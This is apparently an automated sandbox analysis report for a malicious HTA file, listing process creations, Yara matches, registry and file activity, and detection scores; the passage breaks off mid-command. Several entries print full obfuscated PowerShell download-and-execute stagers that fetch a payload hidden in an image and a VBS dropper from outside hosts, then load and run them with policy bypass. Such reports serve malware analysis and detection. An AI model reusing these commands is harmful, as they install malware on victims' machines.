'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)\| invoke-expresSIon"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)\| invoke-expresSIon"	Jump to behavior

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 6548, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_02D80FED	7_2_02D80FED
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_02D81364	7_2_02D81364
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_02D81CCB	7_2_02D81CCB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_02D8186D	7_2_02D8186D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_02D8180F	7_2_02D8180F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_02D81D62	7_2_02D81D62
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07983AF0	9_2_07983AF0

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: Process Memory Space: powershell.exe PID: 6548, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.expl.evad.winHTA@17/18@4/2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\verybestthingswesharedfornew[1].tiff

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zo3v0nrn.1ak.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: na.hta	ReversingLabs: Detection: 28%
Source: na.hta	Virustotal: Detection: 47%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\na.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; 